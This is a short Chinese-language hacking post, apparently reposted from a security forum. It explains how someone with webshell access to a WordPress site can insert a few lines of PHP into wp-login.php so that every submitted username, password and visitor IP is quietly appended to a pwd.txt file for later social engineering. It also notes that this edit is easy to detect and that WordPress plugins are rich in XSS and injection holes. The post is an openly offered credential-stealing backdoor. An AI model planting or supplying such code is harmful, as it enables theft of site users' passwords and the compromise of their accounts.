webshell下记录Wordpress登陆密码方便进一步社工
原处:http://81sec.com/read.php?115
Wordpress的密码破解可以说基本是没招了,悲剧只好采用记录密码了。
在文件wp-login.php中539行处添加:

 

 

// log password
$log_user=$_POST['log'];
$log_pwd=$_POST['pwd'];
$log_ip=$_SERVER["REMOTE_ADDR"];
$txt=$log_user.'|'.$log_pwd.'|'.$log_ip;
$txt=$txt."\r\n";
if($log_user&&$log_pwd&&$log_ip){
@fwrite(fopen('pwd.txt',"a+"),$txt);
}

 

当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。

就是搜索case ‘login’
在它下面直接插入即可,记录的密码生成在pwd.txt中,
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录。

个人观点:

现在wordpress的插件漏洞很多,什么xss,注入,所以wordpress还是很有搞头的...